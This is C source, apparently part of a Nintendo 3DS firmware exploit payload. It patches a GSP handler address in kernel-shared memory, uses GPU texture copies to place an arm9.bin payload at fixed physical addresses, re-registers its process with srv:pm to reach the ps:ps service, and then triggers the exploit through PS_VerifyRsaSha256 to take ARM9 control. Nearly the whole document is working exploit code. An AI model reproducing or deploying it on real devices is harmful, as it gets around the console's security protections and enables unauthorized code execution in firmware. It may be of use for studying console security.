u32 getCurrentProcessHandle() { u32 handle = 0; u32 ret; if (hCurrentProcess != 0) { return hCurrentProcess; } svc_getProcessId(¤tPid, 0xffff8001); ret = svc_openProcess(&handle, currentPid); if (ret != 0) { showDbg("openProcess failed, ret: %08x", ret, 0); return 0; } hCurrentProcess = handle; return hCurrentProcess; }
int __attribute__ ((section (".text.a11.entry"))) _main() { svc_sleepThread(0x10000000); // Get framebuffer addresses uint32_t regs[10]; regs[0] = 0xDEADBABE; regs[1] = 0xBABEDADA; //FIXME where do these reg addresses come from? _GSPGPU_ReadHWRegs(gspHandle, 0x400468, ®s[0+2], 8); // framebuffer 1 top left & framebuffer 2 top left _GSPGPU_ReadHWRegs(gspHandle, 0x400494, ®s[2+2], 8); // framebuffer 1 top right & framebuffer 2 top right _GSPGPU_ReadHWRegs(gspHandle, 0x400568, ®s[4+2], 8); // framebuffer 1 bottom & framebuffer 2 bottom _GSPGPU_ReadHWRegs(gspHandle, 0x400478, ®s[6+2], 4); // framebuffer select top _GSPGPU_ReadHWRegs(gspHandle, 0x400578, ®s[7+2], 4); // framebuffer select bottom //patch gsp event handler addr to kill gsp thread ASAP, PA 0x267CF418 *((u32*)(0x003F8418+0x10+4*0x4))=0x002CA520; //svc 0x9 addr flashScreen(); svc_sleepThread(0x10000000); // Read the main payload to 0x17F00000(0x23F00000 pa) u32* buffer = (work_buffer + 0x10000/sizeof(u32)); IFILE file; unsigned int readBytes; _memset(&file, 0, sizeof(file)); IFile_Open(&file, L"dmc:/arm9.bin", 1); const uint32_t block_size = 0x10000; for(u32 i = 0; i < 0x20000u; i += block_size) { IFile_Read(&file, &readBytes, (void*)buffer, block_size); GSPGPU_FlushDataCache(buffer, block_size); GX_SetTextureCopy(buffer, (void *)(0x17F00000 + i), block_size, 0, 0, 0, 0, 8); if(readBytes != block_size) break; } // Copy the magic to 0x18410000 // Copy it twice to make it easier to find and avoid catching the wrong one buffer[0] = MAGIC_WORD; buffer[1] = MAGIC_WORD; if(regs[6+2]) { buffer[2] = regs[0+2]; buffer[3] = regs[2+2]; } else { buffer[2] = regs[1+2]; buffer[3] = regs[3+2]; } if(regs[7+2]) buffer[4] = regs[4+2]; else buffer[4] = regs[5+2]; // Grab access to PS Handle port; svc_connectToPort(&port, "srv:pm"); srv_RegisterClient(&port); u32 proc = 0; svc_getProcessId(&proc, 0xFFFF8001); srvUnregisterProcess(&port, proc); srvRegisterProcess(&port, proc, 0x18, (const void*)&access_bin[0]); Handle ps_handle = 0; srv_getServiceHandle(&port, &ps_handle, "ps:ps"); svc_sleepThread(0x10000000); // Perform the exploit Result res = PS_VerifyRsaSha256(&ps_handle); // We do not expect reaching here return 0; }
u32 getCurrentProcessId() { svc_getProcessId(¤tPid, 0xffff8001); return currentPid; }